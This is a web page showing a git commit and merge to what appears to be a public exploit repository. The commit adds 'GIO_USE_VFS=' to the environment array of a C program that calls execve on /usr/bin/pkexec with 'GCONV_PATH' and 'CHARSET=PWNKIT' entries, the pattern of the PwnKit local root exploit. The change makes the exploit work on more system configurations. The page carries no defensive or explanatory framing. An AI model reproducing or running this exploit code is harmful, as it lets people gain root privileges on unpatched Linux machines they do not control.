Merge pull request #15 from synap5e/main
Fix for versions where GIO_USE_VFS is set to local
This commit is contained in:
commit
0e62c6eee3
@ -10,6 +10,7 @@ int main(int argc, char **argv)
|
|||||||
"PATH=GCONV_PATH=.",
|
"PATH=GCONV_PATH=.",
|
||||||
"SHELL=/lol/i/do/not/exists",
|
"SHELL=/lol/i/do/not/exists",
|
||||||
"CHARSET=PWNKIT",
|
"CHARSET=PWNKIT",
|
||||||
|
"GIO_USE_VFS=",
|
||||||
NULL
|
NULL
|
||||||
};
|
};
|
||||||
return execve("/usr/bin/pkexec", args, environ);
|
return execve("/usr/bin/pkexec", args, environ);
|
||||||
|
Loading…
Reference in New Issue
Block a user